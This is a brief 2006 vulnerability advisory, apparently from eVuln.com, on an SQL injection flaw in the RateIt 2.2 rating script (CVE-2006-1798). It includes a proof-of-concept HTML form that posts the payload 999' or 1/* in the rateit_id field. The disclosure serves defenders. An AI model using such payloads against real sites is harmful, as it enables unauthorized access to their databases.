SQL Injection Vulnerability in RateIt
Summary
- Vulnerability
- SQL Injection Vulnerability in RateIt
- Discovered
- 2006.04.14
- Last Update
- 2006.04.24 Exploitation code published
- ID
- EV0124
- CVE
- CVE-2006-1798
- Risk Level
- medium
- Type
- SQL Injection
- Status
- Unpatched. No reply from developer(s)
- Vendor
- n/a
- Vulnerable Software
- RateIt (http://www.absoft-my.com/)
- Version
- 2.2
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
SQL Injection found in RateIt (http://www.absoft-my.com/) script.
Vulnerable script: rateit.php
Parameter $rateit_id is not properly sanitized before being used in SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc = off
PoC/Exploit
SQL Injection Example:
<form action="http://[host]/rate/index.php" method="post">
<input name="rate" value="x">
<input name="rateit_id" value="999' or 1/*">
<input name="hotscript_id" value="12345">
<input name="postedcounter" value="1">
<input name="action" value="doit">
<input type="submit" value="Rate!">
</form>
Solution.
Solution for "SQL Injection Vulnerability in RateIt" is not available. Check vendor's website for updates.